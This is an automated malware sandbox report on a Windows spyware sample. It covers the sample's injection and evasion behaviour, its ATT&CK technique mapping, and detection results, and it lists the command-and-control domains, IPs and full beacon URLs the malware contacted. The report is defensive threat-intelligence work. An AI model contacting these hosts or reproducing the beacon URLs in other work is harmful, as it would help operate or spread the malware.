          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432566 Sample: UGGJ4NnzFz Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 31 www.topazsnacks.com 2->31 33 topazsnacks.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 11 UGGJ4NnzFz.exe 20 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 UGGJ4NnzFz.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 growwithjenn.com 160.153.136.3, 49749, 80 GODADDY-AMSDE United States 18->35 37 sw-advisers.com 157.245.232.77, 49743, 80 DIGITALOCEAN-ASNUS United States 18->37 39 16 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 cmmon32.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          UGGJ4NnzFz.exe29%VirustotalBrowse
          UGGJ4NnzFz.exe30%ReversingLabsWin32.Spyware.Noon
          UGGJ4NnzFz.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.UGGJ4NnzFz.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.1.UGGJ4NnzFz.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.UGGJ4NnzFz.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.UGGJ4NnzFz.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          9.2.cmmon32.exe.624368.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          9.2.cmmon32.exe.4a87960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.UGGJ4NnzFz.exe.2290000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.UGGJ4NnzFz.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          SourceDetectionScannerLabelLink
          protectpursuit.com4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.bring-wellness.com/dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ00%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.goldgrandpa.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&amp;rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkT0%Avira URL Cloudsafe
          www.rebeccannemontgomery.net/dp3a/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          protectpursuit.com
          		165.22.38.5
          		truetrueunknown
          bring-wellness.com
          		34.102.136.180
          		truefalse
            		unknown
            sw-advisers.com
            		157.245.232.77
            		truetrue
              		unknown
              www.goldinsacks.com
              		62.149.128.40
              		truetrue
                		unknown
                freshdeliciousberryfarm.com
                		34.102.136.180
                		truefalse
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truetrue
                    		unknown
                    growwithjenn.com
                    		160.153.136.3
                    		truetrue
                      		unknown
                      topazsnacks.com
                      		135.181.180.74
                      		truetrue
                        		unknown
                        www.growwithjenn.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.oilleakgames.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.goodlukc.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.freshdeliciousberryfarm.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.topazsnacks.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.goldgrandpa.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bring-wellness.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sw-advisers.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.2dmaxximumrecords.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.allyexpense.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.protectpursuit.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bring-wellness.com/dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goldgrandpa.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrRtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvPtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              www.rebeccannemontgomery.net/dp3a/true
                                              • Avira URL Cloud: safe
                                              		low

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.tiro.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://nsis.sf.net/NSIS_ErrorErrorUGGJ4NnzFz.exefalse
                                                            		high
                                                            http://www.goodfont.co.krexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorUGGJ4NnzFz.exefalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.fonts.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&amp;rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTcmmon32.exe, 00000009.00000002.479471132.0000000004C02000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      62.149.128.40
                                                                      		www.goldinsacks.comItaly
                                                                      		31034ARUBA-ASNITtrue
                                                                      165.22.38.5
                                                                      		protectpursuit.comUnited States
                                                                      		14061DIGITALOCEAN-ASNUStrue
                                                                      160.153.136.3
                                                                      		growwithjenn.comUnited States
                                                                      		21501GODADDY-AMSDEtrue
                                                                      34.102.136.180
                                                                      		bring-wellness.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      157.245.232.77
                                                                      		sw-advisers.comUnited States
                                                                      		14061DIGITALOCEAN-ASNUStrue
                                                                      23.227.38.74
                                                                      		shops.myshopify.comCanada
                                                                      		13335CLOUDFLARENETUStrue

                                                                      General Information

                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                      Analysis ID:432566
                                                                      Start date:10.06.2021
                                                                      Start time:14:34:38
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 22s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:UGGJ4NnzFz (renamed file extension from none to exe)
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:26
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/4@12/6
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HDC Information:
                                                                      • Successful, ratio: 31.8% (good quality ratio 29.1%)
                                                                      • Quality average: 74.8%
                                                                      • Quality standard deviation: 30.9%
                                                                      HCA Information:
                                                                      • Successful, ratio: 86%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.209.183, 13.88.21.125, 104.42.151.234, 92.122.145.220, 104.43.139.144, 184.30.20.56, 20.82.210.154, 2.20.142.209, 2.20.142.210, 51.103.5.186, 92.122.213.247, 92.122.213.194, 20.54.26.129
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                                                      • Not all processes where analyzed, report is missing behavior information

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      62.149.128.40RFQ - Upgrade Project (PML) 0000052021.exeGet hashmaliciousBrowse
                                                                      • www.goldinsacks.com/dp3a/?Qxo=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35yXCLpOJnP&MJBD=FdFp3xAhctetbXf0
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • www.pisanosportpraxis.com/ued5/?t8o8ntU=GUK9sjNbD89abTK6FD0fM0HcLYLNxgR27Mwej6WDWVFny8CdmUlNI3bKr8QSth3jMvuv&kRm0q=J48P
                                                                      4xMdbgzeJQ.exeGet hashmaliciousBrowse
                                                                      • www.cvacity.info/m2be/?G8oTcJoh=+ymgIVB+JkWP6R7YCSTG+4Qmonnd1NOjLVHuSK9LognEyCSSwr46yM8J3NKVrc9U7VJG&zN9lV=1bj8JTVpMltD8T6P
                                                                      ZGNbR8E726.exeGet hashmaliciousBrowse
                                                                      • www.cvacity.info/m2be/?GVFTh=+ymgIVB+JkWP6R7YCSTG+4Qmonnd1NOjLVHuSK9LognEyCSSwr46yM8J3NKVrc9U7VJG&tv5P=ilQ8UxJh
                                                                      Request for Quotation.exeGet hashmaliciousBrowse
                                                                      • www.wellageing.info/9t6k/?wR=QjLkVttwHxdzSORDX02FearTwV75OHDGJuPijYwpTZJNsfBsNREOp0mBVmvQJfZv0p1b&S0Gll=RRHTxr6PgzuH1
                                                                      bin.exeGet hashmaliciousBrowse
                                                                      • www.premiokapuscinski.com/oncs/?tXUd=B5YGVybFY0FfVyMa/xuDcOPD2UtmSvv3WuoMM449svNwIhQlLpmmoLlg+CGrSypNQb1y&2ddpC=ftxDHdNX
                                                                      dihOaeEonG.exeGet hashmaliciousBrowse
                                                                      • www.19songs.cloud/gtb/?TVg8yB=zjU8DXLHpJb&1bKHt=Ps7s5PaFgdge7g1jPl1xZLRpeoKW9pI+hZGFTIm5CGqXeAxXw8gxxxDKGCrLxWn3IsBjzKiPVQ==
                                                                      49Shipment Notification.exeGet hashmaliciousBrowse
                                                                      • www.my-weddingring.info/hx344/
                                                                      75PO9981.exeGet hashmaliciousBrowse
                                                                      • www.massimogirardi.com/fl/?id=bpWCOVOSS6SPe3t905QmDbxIUFvU4YFvlHZm/J/lB427Q6CrIz/d8uK35d0fGjRo7O/fDAjGyGabL9CG+H8EUQ==
                                                                      79HDS11254.PDF.exeGet hashmaliciousBrowse
                                                                      • www.massimogirardi.com/fl/?id=bpWCOVOSS6SPe3t905QmDbxIUFvU4YFvlHZm/J/lB427Q6CrIz/d8uK35d0fGjRo7O/fDAjGyGabL9CG+H8EUQ==&sql=1
                                                                      2526713SB.PDF.exeGet hashmaliciousBrowse
                                                                      • www.massimogirardi.com/fl/?id=bpWCOVOSS6SPe3t905QmDbxIUFvU4YFvlHZm/J/lB427Q6CrIz/d8uK35d0fGjRo7O/fDAjGyGabL9CG+H8EUQ==&sql=1
                                                                      160.153.136.33arZKnr21W.exeGet hashmaliciousBrowse
                                                                      • www.growwithjenn.com/dp3a/?O8OtHJOh=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi&dL08CF=4hu4H0zXnt1lvdbP
                                                                      Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                      • www.champearthmotors.com/grb/?rZ_PWR=AL0hw0R0lbS&4hOh3f=l2ztJkc0WEZnO6tjQOXxeehI3g/9hod//lJ06u38RCkbOtuk1CxF2ydqT5Dtc6mAZmzf
                                                                      Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                      • www.ktgetchell.com/grb/?w2J=fN9xgXixMFkDih1P&nZLdIfTX=shtTMY44CzrNBT4TVLY1BF8/nx0lRGYb/bv0+DeaWlZWWhA6gADx6inooxeGNzfxNVoV
                                                                      RFQ K1062 PROJECT.exeGet hashmaliciousBrowse
                                                                      • www.growwithjenn.com/dp3a/?i890b4=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5apw7c3IYhJgl&9rMTYd=oPnT
                                                                      PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                      • www.radansaisortagim.com/owws/?UL=-ZlpiB&2dN4wD=MWTlbswL4P3Sg3DoltjxNdlNy+An/ckQozpozVA/KXxmjb6b3UjhpLPBjyIpyyaGjruozMClkQ==
                                                                      Revised_Order PDF.exeGet hashmaliciousBrowse
                                                                      • www.radansaisortagim.com/owws/?Tf3=MWTlbswL4P3Sg3DoltjxNdlNy+An/ckQozpozVA/KXxmjb6b3UjhpLPBjxk5uDG9keH5&7nGp=i4El9bcX
                                                                      Payment_Advice.exeGet hashmaliciousBrowse
                                                                      • www.shivalikspiritualproducts.com/q4kr/?w2MLb=6lux&QtRl=JM7XHLd6JIZomSwbIKh/7iBr49GWoi75tn6r4nQqx6ZeCkVItn9FqPXZu+Qs8bxZGW12
                                                                      Items and Specification Needed for RFQ546092227865431209PDF.exeGet hashmaliciousBrowse
                                                                      • www.qfpclothing.com/ib82/?KXeX=GVNL6hyh3zpxw&jR=KhYG6rC7727xgDFb7WzvOTHmqWh2eYhtkwxt34gVIx1EuNOm22DTsJ3z+g9C8mXQ9PHT
                                                                      STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                      • www.kmeltonbeauty.com/3edq/?wX=Irpq6xX1eV14eXESY49R8tV/qgMqmFwNB65EjppLgmg6KjCBrtuzfWySUxcKuLKJm99p&A0Gh=QBkpkdy86r
                                                                      Ack0527073465.exeGet hashmaliciousBrowse
                                                                      • www.pakelloswimwear.com/5yue/?3fJx=1MQRS7WNCSh3ldaNqFs4eCJGmvueVQRfblZEVMI3dZ/DIEpy1toECUQ7e7eF6mTxOyaW&2dC4V=P48T-VYXSzrLax
                                                                      item.exeGet hashmaliciousBrowse
                                                                      • www.northtlc.com/m3rc/?s864=nrKTeKZE0MKRctV+tdCe7tH49jiRWtcoL+pYt/4T2TK5ImATI1hTaadRMIG2OTwDbmYk&Ntipth=llyx
                                                                      RFQ - Upgrade Project (PML) 0000052021.exeGet hashmaliciousBrowse
                                                                      • www.growwithjenn.com/dp3a/?Qxo=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQBMmog7uBi&MJBD=FdFp3xAhctetbXf0
                                                                      Payment Advice-Pdf.exeGet hashmaliciousBrowse
                                                                      • www.ameliewong.com/5yue/?DVl=cvmL&V6=Nuidjmu34zZgQGUwRWgLjMkpp0iaFgZ10IuE+aaPCvF0mk6r8qIsODEr0g1HErnO8Euw
                                                                      PO_0065-2021.exeGet hashmaliciousBrowse
